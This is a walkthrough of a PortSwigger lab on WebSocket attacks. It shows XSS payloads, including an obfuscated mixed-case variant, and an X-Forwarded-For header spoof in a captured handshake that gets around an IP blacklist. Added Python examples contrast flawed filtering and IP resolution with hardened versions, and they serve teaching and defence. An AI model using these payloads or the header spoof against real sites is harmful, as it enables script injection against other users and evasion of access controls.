Manipulating the WebSocket handshake to exploit vulnerabilities
2023-1-17 17:32:12 Source: infosecwriteups.com

PortSwigger Lab Simple Solution — Manipulating the WebSocket to exploit vulnerabilities | Karthikeyan Nagaraj

Lab Description:

This online shop has a live chat feature implemented using WebSockets.

It has an aggressive but flawed XSS filter.

To solve the lab, use a WebSocket message to trigger an alert() popup in the support agent's browser.

WebSockets are becoming increasingly popular because they greatly simplify the communication between a client and a server.

The WebSocket protocol uses the OSI model application layer (Layer 7) to allow a client and server to perform bidirectional (full duplex) communication. This makes it possible to create dynamic, real-time web applications such as instant messaging and photo-sharing apps.

WebSockets overcome some of the traditional restrictions of communications between browsers and servers:

  • Client requests/server responds — in the past, servers had permanent listeners, while the client (the one using the browser) had no fixed listener for long-lived connections. This made every exchange centre on the client's request and the server's response.
  • Communication is dependent on the client — the server can only push a resource to a client when the client requests it.
  • Continual checking — clients are forced to poll the server repeatedly for new results. This is why libraries focus on optimizing asynchronous calls; each call also has to match its response to the request that issued it. The most common solution to this problem is the use of callback functions.

Analysis:

1. First of all, let’s try the live chat functionality and intercept the traffic using Burp Suite.

2. Send the request you find in the WebSockets history to Repeater.

3. Let’s try to inject an XSS payload and reconnect:

<img src=1 onerror='alert(1)'>

Our address is blacklisted.

4. So now, let’s add an additional header to bypass the blacklisting.

Add the following header to the handshake request to spoof your IP address:

X-Forwarded-For: 1.1.1.1

GET /chat HTTP/1.1
Host: 0ac6003b03db7411c00dd1370074002f.web-security-academy.net
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Sec-WebSocket-Version: 13
Origin: https://0ac6003b03db7411c00dd1370074002f.web-security-academy.net
Sec-WebSocket-Key: YeHso2ZIklfAwWtbrivsDA==
Connection: keep-alive, Upgrade
Cookie: session=pS6iHSLHKf0VWHuWJHhB9lCt523M5hvj
Sec-Fetch-Dest: websocket
Sec-Fetch-Mode: websocket
Sec-Fetch-Site: same-origin
Pragma: no-cache
Cache-Control: no-cache
Upgrade: websocket
X-Forwarded-For: 1.1.1.1
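Why that header works, seen from the server side: the example below is added here and is not the lab's or the author's code. It models a chat server that keys its blacklist on the resolved client address, and places a lookup that trusts X-Forwarded-For from any peer beside one that only honours the header when the TCP peer is a known reverse proxy. The blacklisted address, the proxy range and the reduced header dictionary are constructed for the example; the 1.1.1.1 value and the Host are the ones from the write-up.

```python
"""Resolving the client address for a WebSocket handshake: a spoofable
X-Forwarded-For lookup beside a hardened one. Added example, not lab code."""
from ipaddress import ip_address, ip_network

# Constructed sample: the handshake from the write-up, reduced to the
# headers that matter here, including the attacker-supplied X-Forwarded-For.
HANDSHAKE_HEADERS = {
    "Host": "0ac6003b03db7411c00dd1370074002f.web-security-academy.net",
    "Upgrade": "websocket",
    "Connection": "keep-alive, Upgrade",
    "Sec-WebSocket-Version": "13",
    "X-Forwarded-For": "1.1.1.1",
}

# Hypothetical: an address the chat server blacklisted after earlier XSS
# attempts, and the reverse-proxy range the server sits behind.
BLACKLIST = {"203.0.113.7"}
TRUSTED_PROXIES = [ip_network("10.0.0.0/8")]


def client_ip_naive(headers, peer_ip):
    """Flawed lookup: trusts X-Forwarded-For from anyone, so the 'client
    address' is whatever the requester typed into the header."""
    xff = headers.get("X-Forwarded-For")
    if xff:
        return xff.split(",")[0].strip()
    return peer_ip


def _is_trusted_proxy(addr, trusted):
    try:
        ip = ip_address(addr)
    except ValueError:
        return False  # garbage in the header is never a trusted hop
    return any(ip in net for net in trusted)


def client_ip_trusted(headers, peer_ip, trusted=TRUSTED_PROXIES):
    """Hardened lookup: the header is consulted only when the TCP peer is a
    trusted proxy, and it is walked right-to-left, discarding every hop that
    is itself a trusted proxy. The first untrusted hop is the client; anything
    to its left was supplied by the client and carries no authority."""
    if not _is_trusted_proxy(peer_ip, trusted):
        return peer_ip  # direct connection: ignore the header entirely
    hops = [h.strip() for h in headers.get("X-Forwarded-For", "").split(",") if h.strip()]
    for hop in reversed(hops):
        if not _is_trusted_proxy(hop, trusted):
            return hop
    return peer_ip  # every hop was one of ours; fall back to the peer


def is_blocked(headers, peer_ip, resolver=client_ip_trusted):
    """Blacklist decision keyed on whichever resolver the server uses."""
    return resolver(headers, peer_ip) in BLACKLIST


if __name__ == "__main__":
    blacklisted_peer = "203.0.113.7"
    print("naive resolver   ->", client_ip_naive(HANDSHAKE_HEADERS, blacklisted_peer),
          "blocked:", is_blocked(HANDSHAKE_HEADERS, blacklisted_peer, client_ip_naive))
    print("trusted resolver ->", client_ip_trusted(HANDSHAKE_HEADERS, blacklisted_peer),
          "blocked:", is_blocked(HANDSHAKE_HEADERS, blacklisted_peer))
```

With the naive resolver the blacklisted peer becomes 1.1.1.1 and sails through, which is exactly the bypass in step 4; with the hardened resolver a direct connection keeps its socket address and stays blocked, while a request that genuinely arrived via a 10.0.0.0/8 proxy still resolves to the real client behind it.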

5. Now click Connect and send a WebSocket message containing an obfuscated XSS payload, such as:

<img src=1 oNeRrOr=alert`1`>
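The reason the obfuscated payload gets through is that a blacklist filter matches strings, not what the browser will parse. The example below is added here and is not the lab's code: the filter is a hypothetical reconstruction with the two weaknesses the write-up exploits (case-sensitive patterns and a fixed `alert(` call syntax), not PortSwigger's actual filter. Beside it sits the mitigation a defender would reach for, encoding the message on output so that neither payload is ever interpreted as markup. The two payloads are the ones quoted above.

```python
"""A flawed blacklist XSS filter beside output encoding. Added example, not
the lab's code; the filter is a hypothetical reconstruction of the flaw."""
import html
import re

# Payloads quoted from the write-up: the first is rejected by the lab's
# filter, the second gets through.
PAYLOAD_REJECTED = "<img src=1 onerror='alert(1)'>"
PAYLOAD_OBFUSCATED = "<img src=1 oNeRrOr=alert`1`>"

# Hypothetical blacklist with the weaknesses the write-up relies on.
BLOCKED_PATTERNS = [
    re.compile(r"onerror\s*="),  # lower-case only: oNeRrOr= is not matched
    re.compile(r"alert\("),      # fixed call syntax: alert`1` is not matched
]


def blacklist_filter(message):
    """Return True if the flawed filter lets the message through."""
    return not any(p.search(message) for p in BLOCKED_PATTERNS)


def render_chat_line(message):
    """Hardened alternative: HTML-encode on output, so the support agent's
    browser renders the message as text regardless of what the filter saw.
    quote=True also encodes ' and ", covering attribute contexts."""
    return "<p>" + html.escape(message, quote=True) + "</p>"


def is_markup_neutralised(rendered):
    """Check: apart from the wrapping <p>, a safely rendered line contains
    no raw tag delimiters for the browser to act on."""
    inner = rendered[len("<p>"):-len("</p>")]
    return "<" not in inner and ">" not in inner


if __name__ == "__main__":
    for payload in (PAYLOAD_REJECTED, PAYLOAD_OBFUSCATED):
        print("filter allows:", blacklist_filter(payload))
        print("encoded      :", render_chat_line(payload))
```

The filter rejects the first payload and passes the second, reproducing the lab's behaviour, whereas output encoding turns both into inert text. Filters can be a useful second layer for detection, but the control that actually prevents the popup is encoding at the point where chat messages are written into the agent's page.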

Feel free to ask queries via LinkedIn and to buy me a coffee : )

Thank you for Reading!!

Happy Hunting ~

Author: Karthikeyan Nagaraj ~ Cyberw1ng

Source: https://infosecwriteups.com/manipulating-the-websocket-handshake-to-exploit-vulnerabilities-7f8dc3504e9c?source=rss----7b722bfd1b8d--bug_bounty